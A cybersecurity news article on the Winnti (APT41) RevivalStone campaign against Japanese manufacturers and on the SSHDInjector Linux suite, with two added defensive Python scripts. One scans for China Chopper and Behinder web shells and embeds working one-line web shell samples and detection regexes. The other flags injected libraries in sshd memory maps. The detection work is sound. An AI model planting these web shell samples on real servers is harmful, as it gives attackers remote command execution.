The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024.
The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41 cyber espionage group, by Cybereason under the name Operation CuckooBees, and by Symantec as Blackfly.
APT41 has been described as a highly skilled and methodical actor with the ability to mount espionage attacks as well as poison the supply chain. Its campaigns are often designed with stealth in mind, leveraging a bevy of tactics to achieve its goals by using a custom toolset that not only bypasses security software installed in the environment, but also harvests critical information and establishes covert channels for persistent remote access.

“The group’s espionage activities, many of which are aligned with the country’s strategic objectives, have targeted a wide range of public and private industry sectors around the world,” LAC said.
“The attacks of this threat group are characterized by the use of Winnti malware, which has a unique rootkit that allows for the hiding and manipulation of communications, as well as the use of stolen, legitimate digital certificates in the malware.”
Winnti, active since at least 2012, has primarily singled out manufacturing and materials-related organizations in Asia as of 2022, with recent campaigns between November 2023 and October 2024 targeting the Asia-Pacific (APAC) region exploiting weaknesses in public-facing applications like IBM Lotus Domino to deploy malware as follows –
- DEATHLOTUS – A passive CGI backdoor that supports file creation and command execution
- UNAPIMON – A defense evasion utility written in C++
- PRIVATELOG – A loader that's used to drop Winnti RAT (aka DEPLOYLOG) which, in turn, delivers a kernel-level rootkit named WINNKIT by means of a rootkit installer
- CUNNINGPIGEON – A backdoor that uses the Microsoft Graph API to fetch commands – file and process management, and custom proxy – from mail messages
- WINDJAMMER – A rootkit with capabilities to intercept the TCP/IP network interface, as well as create covert channels with infected endpoints within the intranet
- SHADOWGAZE – A passive backdoor reusing the listening port of the IIS web server
The latest attack chain documented by LAC has been found to exploit an SQL injection vulnerability in an unspecified enterprise resource planning (ERP) system to drop web shells such as China Chopper and Behinder (aka Bingxia and IceScorpion) on the compromised server, using the access to perform reconnaissance, collect credentials for lateral movement, and deliver an improved version of the Winnti malware.
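A web shell dropped through an ERP SQL injection lives as a file under the web root, so the quickest triage on a suspected server is a content scan for the tell-tale constructs of the two families named above. The script below is an added example for this article, not code from LAC's report or from the threat actor's toolset; its indicator patterns, weights and threshold are assumptions drawn from the publicly documented one-line China Chopper shells (an `eval` over a request parameter) and the Behinder PHP shell's habit of reading `php://input` and decrypting it with `openssl_decrypt` before `eval`, and the sample files are constructed for a self-contained run.

```python
"""Added example: content-based scan for China Chopper / Behinder style web shells.
Indicator regexes, weights and THRESHOLD are this example's assumptions; tune them
for the server's actual code base before relying on the results."""
import re
from pathlib import Path

# (name, pattern, weight). Weights are assumptions: a single Chopper-style
# eval-of-request is enough on its own; Behinder needs several traits together.
INDICATORS = [
    ("china_chopper_aspx", re.compile(r'eval\s*\(\s*Request\.Item\[', re.I), 10),
    ("china_chopper_php", re.compile(r'@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[', re.I), 10),
    ("china_chopper_jsp", re.compile(r'request\.getParameter\(.*?\).*?(defineClass|newInstance)', re.I | re.S), 6),
    ("behinder_raw_input", re.compile(r'file_get_contents\s*\(\s*["\']php://input["\']', re.I), 4),
    ("behinder_aes", re.compile(r'openssl_decrypt\s*\([^)]*AES', re.I), 4),
    ("behinder_invoke_eval", re.compile(r'__invoke.*?eval\s*\(', re.I | re.S), 4),
    ("generic_exec", re.compile(r'\b(system|shell_exec|passthru|proc_open|popen)\s*\(', re.I), 2),
]
THRESHOLD = 8  # assumption: files scoring at or above this are reported


def score_content(text: str):
    """Return (score, [matched indicator names]) for one file's content."""
    hits = [name for name, rx, _w in INDICATORS if rx.search(text)]
    score = sum(w for name, _rx, w in INDICATORS if name in hits)
    return score, hits


def scan_tree(root: Path, suffixes=(".php", ".aspx", ".asp", ".jsp", ".jspx")):
    """Walk a web root and return [(path, score, hits)] for files over THRESHOLD."""
    findings = []
    for p in root.rglob("*"):
        if not p.is_file() or p.suffix.lower() not in suffixes:
            continue
        try:
            text = p.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        score, hits = score_content(text)
        if score >= THRESHOLD:
            findings.append((str(p), score, hits))
    return findings


# Constructed samples (not recovered artifacts) so the example runs offline.
SAMPLES = {
    "chopper.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "chopper.php": "<?php @eval($_POST['pass']); ?>",
    "behinder.php": ("<?php session_start(); $key='0123456789abcdef'; "
                     "$post=file_get_contents(\"php://input\"); "
                     "$post=openssl_decrypt($post, \"AES128\", $key); "
                     "class C{public function __invoke($p){eval($p.\"\");}} "
                     "@call_user_func(new C(), explode('|',$post)[1]); ?>"),
    "index.php": "<?php echo 'hello'; $x = system('uptime'); ?>",  # benign-ish noise
}


def scan_samples():
    """Score the constructed samples; used for the stand-alone run and the test."""
    return {name: score_content(text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, (score, hits) in scan_samples().items():
        flag = "SUSPICIOUS" if score >= THRESHOLD else "ok"
        print(f"{name:14s} score={score:2d} {flag:10s} {hits}")
```

A content scan of this kind is a triage aid, not proof: both families are trivially re-obfuscated, so pair it with the server's own evidence (files whose modification time coincides with the injection window, web server logs showing POSTs to a newly created script, and the ERP database's file-write capabilities) rather than treating a low score as a clean bill of health.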

The intrusion's reach is said to have been expanded further to breach a managed service provider (MSP) by leveraging a shared account, followed by weaponizing the company's infrastructure to propagate the malware further to three other organizations.
LAC said it also found references to TreadStone and StoneV5 in the RevivalStone campaign, with the former being a controller that's designed to work with the Winnti malware and which was also included in the I-Soon (aka Anxun) leak of last year in connection with a Linux malware control panel.

“Although it is only speculation, if TreadStone has the same meaning as the Winnti malware, StoneV5 could also mean Version 5, and it's possible that the malware used in this attack is Winnti v5.0,” researchers Takuma Matsumoto and Yoshihiro Ishikawa said.
“The new Winnti malware has been implemented with features such as obfuscation, updated encryption algorithms, and evasion of security products, and it's likely that this attacker group will continue to update the capabilities of the Winnti malware and use it in attacks.”
The disclosure comes as Fortinet FortiGuard Labs detailed a Linux-based attack suite dubbed SSHDInjector that's equipped to hijack the SSH daemon on network appliances by injecting malware into the process for persistent access and covert actions since November 2024.
The malware suite, associated with another Chinese nation-state hacking group known as Daggerfly (aka Bronze Highland and Evasive Panda), is engineered for data exfiltration, listening for incoming instructions from a remote server to enumerate running processes and services, perform file operations, launch a terminal, and execute terminal commands.
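Code injected into a running sshd has to be mapped into that process, and on Linux the mapping is visible in `/proc/<pid>/maps` even when the file on disk has been removed. The check below is an added example for this article, not FortiGuard's analysis code or any part of SSHDInjector; it flags executable mappings in sshd that are anonymous, backed by a deleted file, or loaded from outside an allowlist of library directories. The allowlist and the sample maps text are this example's own assumptions (the sample is constructed, not a real capture), and the path prefixes must be adapted to the appliance's distribution.

```python
"""Added example: spot injected shared objects in sshd via /proc/<pid>/maps.
TRUSTED_PREFIXES and SAMPLE_MAPS are assumptions for illustration."""
import re
from pathlib import Path

# Assumption: on the target system, sshd's legitimate code lives under these paths.
TRUSTED_PREFIXES = ("/usr/lib", "/usr/lib64", "/lib", "/lib64",
                    "/usr/sbin/sshd", "/usr/libexec")

# address range, perms, offset, dev, inode, optional path
MAPS_LINE = re.compile(r'^\S+\s+(\S{4})\s+\S+\s+\S+\s+\d+\s*(.*)$')


def suspicious_mappings(maps_text: str):
    """Return [(reason, path)] for executable mappings that look injected."""
    findings = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        perms, path = m.group(1), m.group(2).strip()
        if 'x' not in perms:
            continue  # only executable mappings can run injected code
        if not path:
            findings.append(("anonymous executable mapping", "<anon>"))
        elif path.startswith('['):
            continue  # kernel-provided regions such as [vdso] and [stack]
        elif path.endswith("(deleted)"):
            findings.append(("mapped file deleted from disk", path))
        elif not path.startswith(TRUSTED_PREFIXES):
            findings.append(("executable mapping outside trusted paths", path))
    return findings


def check_sshd_processes():
    """Scan every sshd on this host (Linux only; reading /proc of root processes needs root)."""
    results = {}
    for proc in Path("/proc").glob("[0-9]*"):
        try:
            if (proc / "comm").read_text().strip() != "sshd":
                continue
            results[int(proc.name)] = suspicious_mappings((proc / "maps").read_text())
        except (OSError, ValueError):
            continue  # process exited or is unreadable; move on
    return results


# Constructed /proc/<pid>/maps excerpt: sshd, libc, plus three injection traces.
SAMPLE_MAPS = """\
55d1c2a00000-55d1c2a1c000 r--p 00000000 fd:01 1234 /usr/sbin/sshd
55d1c2a1c000-55d1c2b0a000 r-xp 0001c000 fd:01 1234 /usr/sbin/sshd
7f3a10000000-7f3a10021000 rw-p 00000000 00:00 0
7f3a10400000-7f3a10422000 r-xp 00000000 fd:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7f3a10800000-7f3a10805000 r-xp 00000000 fd:01 9999 /tmp/.x/libsshd.so
7f3a10900000-7f3a10910000 r-xp 00000000 00:00 0
7f3a10a00000-7f3a10a08000 r-xp 00000000 fd:01 4242 /dev/shm/payload.so (deleted)
7ffd4c000000-7ffd4c021000 rw-p 00000000 00:00 0 [stack]
7ffd4c1ff000-7ffd4c201000 r-xp 00000000 00:00 0 [vdso]
"""

if __name__ == "__main__":
    for reason, path in suspicious_mappings(SAMPLE_MAPS):
        print(f"{reason}: {path}")
```

Run `check_sshd_processes()` as root on a live host to inspect real daemons. A hit from the allowlist branch is only as good as the allowlist, so confirm it against the package manager's file list and the daemon's expected dependencies (for example `ldd` on the sshd binary); an anonymous executable region or a deleted backing file inside sshd, by contrast, has no routine explanation and warrants a memory dump of the process before it is restarted.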